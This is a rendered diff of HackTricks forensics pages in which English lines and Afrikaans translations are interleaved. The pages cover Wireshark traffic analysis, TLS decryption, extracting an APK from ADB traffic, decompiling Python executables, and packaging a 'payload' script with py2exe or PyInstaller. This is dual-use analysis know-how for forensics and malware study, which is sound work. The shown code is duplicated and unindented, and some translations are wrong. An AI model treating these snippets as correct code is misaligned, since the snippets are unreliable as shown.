<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Improve your Wireshark skills
## Verbeter jou Wireshark-vaardighede
### Tutorials
### Tutoriale
The following tutorials are amazing to learn some cool basic tricks:
Die volgende tutoriale is fantasties om 'n paar koel basiese truuks te leer:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
### Analysed Information
### Geanaliseerde inligting
**Expert Information**
**Ekspertinligting**
Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**:
Deur te klik op _**Analyze** --> **Expert Information**_ sal jy 'n **oorsig** kry van wat in die geanaliseerde pakkies gebeur:
![](<../../../.gitbook/assets/image (570).png>)
**Resolved Addresses**
**Opgeloste adresse**
Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication.
Onder _**Statistics --> Resolved Addresses**_ kan jy verskeie **inligting** vind wat deur Wireshark "**opgelos**" is, soos poort/vervoer na protokol, MAC na die vervaardiger, ens. Dit is interessant om te weet wat betrokke is in die kommunikasie.
![](<../../../.gitbook/assets/image (571).png>)
**Protocol Hierarchy**
**Protokolhiërargie**
Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them.
Onder _**Statistics --> Protocol Hierarchy**_ kan jy die **protokolle** vind wat betrokke is by die kommunikasie en inligting daaroor.
![](<../../../.gitbook/assets/image (572).png>)
**Conversations**
**Gesprekke**
Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
Onder _**Statistics --> Conversations**_ kan jy 'n **opsomming van die gesprekke** in die kommunikasie vind en inligting daaroor.
![](<../../../.gitbook/assets/image (573).png>)
**Endpoints**
**Eindpunte**
Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
Onder _**Statistics --> Endpoints**_ kan jy 'n **opsomming van die eindpunte** in die kommunikasie vind en inligting daaroor.
![](<../../../.gitbook/assets/image (575).png>)
**DNS info**
**DNS-inligting**
Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
Onder _**Statistics --> DNS**_ kan jy statistieke oor die vasgevangste DNS-versoek vind.
![](<../../../.gitbook/assets/image (577).png>)
**I/O Graph**
**I/O-grafiek**
Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
Onder _**Statistics --> I/O Graph**_ kan jy 'n **grafiek van die kommunikasie** vind.
![](<../../../.gitbook/assets/image (574).png>)
### Filters
### Filtreerders
Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Other interesting filters:
Hier kan jy Wireshark-filtreerders vind, afhangende van die protokol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
Ander interessante filtreerders:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic
* HTTP- en aanvanklike HTTPS-verkeer
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic + TCP SYN
* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests
* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN + DNS-versoeke
### Search
### Soek
If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column.
As jy wil **soek** na **inhoud** binne die **pakkies** van die sessies, druk _CTRL+f_. Jy kan nuwe lae byvoeg tot die hoofinligtingstabel (No., Tyd, Bron, ens.) deur die regterknoppie te druk en dan die kolom te wysig.
### Free pcap labs
### Gratis pcap-laboratoriums
**Practice with the free challenges of: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
**Oefen met die gratis uitdagings van: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
## Identifying Domains
## Identifiseer domeine
You can add a column that shows the Host HTTP header:
Jy kan 'n kolom byvoeg wat die Host HTTP-kop wys:
![](<../../../.gitbook/assets/image (403).png>)
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
En 'n kolom wat die Bedienernaam byvoeg van 'n inisieerende HTTPS-verbinding (**ssl.handshake.type == 1**):
![](<../../../.gitbook/assets/image (408) (1).png>)
## Identifying local hostnames
## Identifiseer plaaslike hostnames
### From DHCP
### Vanaf DHCP
In current Wireshark instead of `bootp` you need to search for `DHCP`
In die huidige Wireshark moet jy in plaas van `bootp` soek vir `DHCP`
![](<../../../.gitbook/assets/image (404).png>)
### From NBNS
### Vanaf NBNS
![](<../../../.gitbook/assets/image (405).png>)
## Decrypting TLS
## Ontsleutel TLS
### Decrypting https traffic with server private key
### Ontsleutel https-verkeer met bedienerprivaatsleutel
_edit>preference>protocol>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
Druk _Edit_ en voeg al die data van die bediener en die privaatsleutel by (_IP, Poort, Protokol, Sleutel-lêer en wagwoord_)
### Decrypting https traffic with symmetric session keys
### Ontsleutel https-verkeer met simmetriese sessiesleutels
Both Firefox and Chrome have the capability to log TLS session keys, which can be used with Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
Beide Firefox en Chrome het die vermoë om TLS-sessiesleutels te log, wat met Wireshark gebruik kan word om TLS-verkeer te ontsleutel. Dit maak diepgaande analise van veilige kommunikasie moontlik. Meer besonderhede oor hoe om hierdie ontsleuteling uit te voer, is te vinde in 'n gids by [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
To detect this search inside the environment for to variable `SSLKEYLOGFILE`
Om dit op te spoor, soek binne die omgewing na die veranderlike `SSLKEYLOGFILE`
A file of shared keys will look like this:
'n Lêer van gedeelde sleutels sal so lyk:
![](<../../../.gitbook/assets/image (99).png>)
To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename:
Om dit in Wireshark in te voer, gaan na \_edit > preference > protocol > ssl > en voer dit in (Pre)-Master-Secret log filename:
![](<../../../.gitbook/assets/image (100).png>)
## ADB communication
Extract an APK from an ADB communication where the APK was sent:
## ADB-kommunikasie
Onttrek 'n APK uit 'n ADB-kommunikasie waar die APK gestuur is:
```python
from scapy.all import *
pcap = rdpcap("final2.pcapng")
def rm_data(data):
splitted = data.split(b"DATA")
if len(splitted) == 1:
return data
else:
return splitted[0]+splitted[1][4:]
splitted = data.split(b"DATA")
if len(splitted) == 1:
return data
else:
return splitted[0]+splitted[1][4:]
all_bytes = b""
for pkt in pcap:
if Raw in pkt:
a = pkt[Raw]
if b"WRTE" == bytes(a)[:4]:
all_bytes += rm_data(bytes(a)[24:])
else:
all_bytes += rm_data(bytes(a))
if Raw in pkt:
a = pkt[Raw]
if b"WRTE" == bytes(a)[:4]:
all_bytes += rm_data(bytes(a)[24:])
else:
all_bytes += rm_data(bytes(a))
print(all_bytes)
f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

176
forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
View file

@ -1,89 +1,78 @@
# Decompile compiled python binaries (exe, elf) - Retreive from .pyc
# Ontkompilering van gekompileerde Python-binêre (exe, elf) - Herwin vanaf .pyc
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_).
{% embed url="https://www.stmcyber.com/careers" %}
## From Compiled Binary to .pyc
From an **ELF** compiled binary you can **get the .pyc** with:
## Vanaf Gekompileerde Binêre na .pyc
Vanaf 'n **ELF** gekompileerde binêre kan jy die **.pyc** kry met:
```bash
pyi-archive_viewer <binary>
# The list of python modules will be given here:
[(0, 230, 311, 1, 'm', 'struct'),
(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
(15535, 2514, 4421, 1, 's', 'binary_name'),
(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
(15535, 2514, 4421, 1, 's', 'binary_name'),
...
? X binary_name
to filename? /tmp/binary.pyc
```
In a **python exe binary** compiled you can **get the .pyc** by running:
In 'n **python exe binêre** wat gekompileer is, kan jy die .pyc kry deur die volgende uit te voer:
```bash
python pyinstxtractor.py executable.exe
```
## Van .pyc na Python-kode
## From .pyc to python code
For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
Vir die **.pyc**-data ("gekompileerde" Python) moet jy begin om te probeer om die **oorspronklike** **Python**-kode te **onttrek**:
```bash
uncompyle6 binary.pyc > decompiled.py
```
**Maak seker** dat die binêre lêer die **uitbreiding** "**.pyc**" het (as dit nie die geval is nie, sal uncompyle6 nie werk nie)
**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work)
While executing **uncompyle6** you might find the **following errors**:
### Error: Unknown magic number 227
Terwyl jy **uncompyle6** uitvoer, mag jy die **volgende foute** teëkom:
### Fout: Onbekende magiese nommer 227
```bash
/kali/.local/bin/uncompyle6 /tmp/binary.pyc
Unknown magic number 227 in /tmp/binary.pyc
```
Om dit reg te stel, moet jy die korrekte "magic number" by die begin van die gegenereerde lêer voeg.
To fix this you need to **add the correct magic number** at the beginning of the generated file.
**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute:
"Magic numbers" verskil met die Python-weergawe, om die "magic number" van Python 3.8 te kry, moet jy 'n Python 3.8-terminal oopmaak en die volgende uitvoer:
```
>> import imp
>> imp.get_magic().hex()
'550d0d0a'
```
Die **sielkundige nommer** in hierdie geval vir python3.8 is **`0x550d0d0a`**, dan, om hierdie fout reg te stel, sal jy nodig hê om dit by die **begin** van die **.pyc-lêer** die volgende bytes by te voeg: `0x0d550a0d000000000000000000000000`
The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000`
**Once** you have **added** that magic header, the **error should be fixed.**
This is how a correctly added **.pyc python3.8 magic header** will look like:
**Sodra** jy daardie sielkundige kop bygevoeg het, behoort die **fout reggestel te wees.**
So lyk 'n korrek bygevoegde **.pyc python3.8 sielkundige kop**:
```bash
hexdump 'binary.pyc' | head
0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000
@ -91,28 +80,26 @@ hexdump 'binary.pyc' | head
0000020 0700 0000 4000 0000 7300 0132 0000 0064
0000030 0164 006c 005a 0064 0164 016c 015a 0064
```
### Fout: Decompiling generiese foute
### Error: Decompiling generic errors
**Ander foute** soos: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` kan voorkom.
**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` may appear.
Dit beteken waarskynlik dat jy die **sielkundige nommer nie korrek bygevoeg het nie** of dat jy nie die **korrekte sielkundige nommer gebruik het nie**, so maak **seker dat jy die korrekte een gebruik** (of probeer 'n nuwe een).
This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one).
Kyk na die vorige foutdokumentasie.
Check the previous error documentation.
## Outomatiese hulpmiddel
## Automatic Tool
Die **[python-exe-unpacker-hulpmiddel](https://github.com/countercept/python-exe-unpacker)** dien as 'n kombinasie van verskeie gemeenskapsbeskikbare hulpmiddels wat ontleders help om uitvoerbare lêers wat in Python geskryf is, te ontleed en te dekompilieer, spesifiek dié wat met py2exe en pyinstaller geskep is. Dit sluit YARA-reëls in om te identifiseer of 'n uitvoerbare lêer op Python gebaseer is en bevestig die skeppingstool.
The **[python-exe-unpacker tool](https://github.com/countercept/python-exe-unpacker)** serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool.
### ImportError: Lêernaam: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' bestaan nie
### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process.
Example of the issue:
'n Algemene probleem wat ondervind word, behels 'n onvolledige Python-sielkode-lêer as gevolg van die **ontpakkingsproses met unpy2exe of pyinstxtractor**, wat dan **nie deur uncompyle6 erken word nie as gevolg van 'n ontbrekende Python-sielkode-weergawe-nommer**. Om dit aan te spreek, is 'n voorvoegselopsie bygevoeg wat die nodige Python-sielkode-weergawe-nommer byvoeg en die dekompilasieproses vergemaklik.
Voorbeeld van die probleem:
```python
# Error when attempting to decompile without the prepend option
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
Traceback (most recent call last):
...
ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist
@ -127,11 +114,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
# Successfully decompiled file
[+] Successfully decompiled.
```
## Analiseer Python-samestelling
## Analyzing python assembly
If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
As jy nie in staat was om die oorspronklike Python-kode te onttrek nie volgens die vorige stappe, kan jy probeer om die samestelling te onttrek (maar dit is nie baie beskrywend nie, so probeer weer om die oorspronklike kode te onttrek). Ek het 'n baie eenvoudige kode gevind om die _.pyc_ binêre kode te ontbind (sterkte met die verstaan van die kodevloei) [hier](https://bits.theorem.co/protecting-a-python-codebase/). As die _.pyc_ van Python2 afkomstig is, gebruik Python2:
```bash
>>> import dis
>>> import marshal
@ -157,34 +142,32 @@ True
>>>
>>> # Disassemble the code object
>>> dis.disassemble(code)
1 0 LOAD_CONST 0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
3 MAKE_FUNCTION 0
6 STORE_NAME 0 (hello_world)
9 LOAD_CONST 1 (None)
12 RETURN_VALUE
1 0 LOAD_CONST 0 (<code object hello_world at 0x7f31b7240eb0, file "hello.py", line 1>)
3 MAKE_FUNCTION 0
6 STORE_NAME 0 (hello_world)
9 LOAD_CONST 1 (None)
12 RETURN_VALUE
>>>
>>> # Also disassemble that const being loaded (our function)
>>> dis.disassemble(code.co_consts[0])
2 0 LOAD_CONST 1 ('Hello {0}')
3 LOAD_ATTR 0 (format)
6 LOAD_FAST 0 (name)
9 CALL_FUNCTION 1
12 PRINT_ITEM
13 PRINT_NEWLINE
14 LOAD_CONST 0 (None)
17 RETURN_VALUE
2 0 LOAD_CONST 1 ('Hello {0}')
3 LOAD_ATTR 0 (format)
6 LOAD_FAST 0 (name)
9 CALL_FUNCTION 1
12 PRINT_ITEM
13 PRINT_NEWLINE
14 LOAD_CONST 0 (None)
17 RETURN_VALUE
```
## Python na Uitvoerbare lêer
## Python to Executable
Om te begin, gaan ons jou wys hoe ladingstukke gekompileer kan word in py2exe en PyInstaller.
To start, were going to show you how payloads can be compiled in py2exe and PyInstaller.
### To create a payload using py2exe:
1. Install the py2exe package from [http://www.py2exe.org/](http://www.py2exe.org)
2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option “bundle\_files” with the value of 1 will bundle everything including the Python interpreter into one exe.
3. Once the script is ready, we will issue the command “python setup.py py2exe”. This will create the executable, just like in Figure 2.
### Om 'n ladingstuk te skep met behulp van py2exe:
1. Installeer die py2exe-pakket vanaf [http://www.py2exe.org/](http://www.py2exe.org)
2. Vir die ladingstuk (in hierdie geval noem ons dit hello.py), gebruik 'n skripsie soos die een in Figuur 1. Die opsie "bundle\_files" met die waarde van 1 sal alles insluitend die Python-tolk in een uitvoerbare lêer saamvoeg.
3. Sodra die skripsie gereed is, sal ons die opdrag "python setup.py py2exe" uitreik. Dit sal die uitvoerbare lêer skep, net soos in Figuur 2.
```python
from distutils.core import setup
import py2exe, sys, os
@ -192,10 +175,10 @@ import py2exe, sys, os
sys.argv.append('py2exe')
setup(
options = {'py2exe': {'bundle_files': 1}},
#windows = [{'script': "hello.py"}],
console = [{'script': "hello.py"}],
zipfile = None,
options = {'py2exe': {'bundle_files': 1}},
#windows = [{'script': "hello.py"}],
console = [{'script': "hello.py"}],
zipfile = None,
)
```
@ -212,12 +195,10 @@ running py2exe
copying C:\Python27\lib\site-packages\py2exe\run.exe -> C:\Users\test\Desktop\test\dist\hello.exe
Adding python27.dll as resource to C:\Users\test\Desktop\test\dist\hello.exe
```
### Om 'n payload te skep met behulp van PyInstaller:
### To create a payload using PyInstaller:
1. Install PyInstaller using pip (pip install pyinstaller).
2. After that, we will issue the command “pyinstaller onefile hello.py” (a reminder that hello.py is our payload). This will bundle everything into one executable.
1. Installeer PyInstaller met behulp van pip (pip install pyinstaller).
2. Daarna sal ons die opdrag "pyinstaller --onefile hello.py" uitreik (let wel dat 'hello.py' ons payload is). Dit sal alles saamvoeg in een uitvoerbare lêer.
```
C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
108 INFO: PyInstaller: 3.3.1
@ -230,27 +211,26 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
5982 INFO: Appending archive to EXE C:\Users\test\Desktop\test\dist\hello.exe
6325 INFO: Building EXE from out00-EXE.toc completed successfully.
```
## References
## Verwysings
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
As jy belangstel in 'n **hackerloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_).
{% embed url="https://www.stmcyber.com/careers" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

34
forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md
View file

@ -1,21 +1,19 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
